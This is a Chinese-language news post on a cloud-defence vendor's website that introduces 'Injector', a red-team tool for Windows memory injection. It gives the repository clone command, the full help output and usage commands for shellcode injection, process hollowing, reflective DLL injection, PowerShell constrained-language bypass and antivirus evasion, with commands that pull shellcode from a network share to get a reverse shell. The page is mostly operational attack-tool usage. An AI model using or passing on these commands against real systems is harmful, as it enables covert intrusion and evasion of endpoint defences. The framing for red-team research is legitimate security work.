行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
如何使用Injector实现Windows下的内存注入
2021-09-13 13:56:54 【

关于Injector

Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。

Injector能做什么?

针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程,它将会创建一个记事本进程,并注入其中实现持久化感染。

  • 支持反射DLL注入,工具将下载DLL并注入远程进程。

  • 通过exe实现进程镂空。

  • 使用-bypass参数,以支持使用更高级的、未记录的API来进行进程注入。

  • 支持加密的Shellcode,比如说AES加密或异或加密等。

  • 支持针对PowerShell的CLM绕过,可以直接将代码存防止能够执行C#代码的白名单文件夹中,比如说“C:\Windows\Tasks”。

  • 支持DLL镂空,通过dll实现。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git

工具帮助

  1. C:\Users\admin>Injector.exe

  2. Help Options for Xenon:

  3. -m       Mode of operation

  4.        -m 1     Specifies the mode as Process injection

  5.        -m 2     Specifies the mode as Reflective DLL Injection

  6.        -m 3     Specifies the mode as Process Hollowing

  7.        -m 4     No injection! Give me my damn shell

  8.        -m 5     Powershell session via CLM bypass

  9.        -m 6     DLL hollowing

  10.  

  11. -TempFile        File location that your current user can read

  12. -shellcode       Use shellcode

  13. -dll     Use dll

  14. -decrypt-xor     Specify Xor decryption for shellcode

  15.         -pass   Specifty the password for Xor decryption

  16. -decrypt-aes     Specify aes decryption for shellcode

  17.         -pass   Specifty the password for aes decryption

  18. -location        Specify the location i.e either server or local

  19. -bypass         Uses enhance attempts to bypass AV

如需生成加密的Shellcode,请在Kali下使用Helper.exe。

工具使用样例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass

上述命令将解密你的Shellcode并给你一个反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令运行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt"

将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt

上述命令将提供要给会话,我们可以使用它来执行IEX cradle,并获取一个能够绕过CLM的反向Shell。

PowerShell

你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇ddos带来的损失有哪些? 下一篇验证码的历史与黑产的纠葛

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:13051179500 18910191973
企业QQ:1245940436
技术支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:18910191973
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800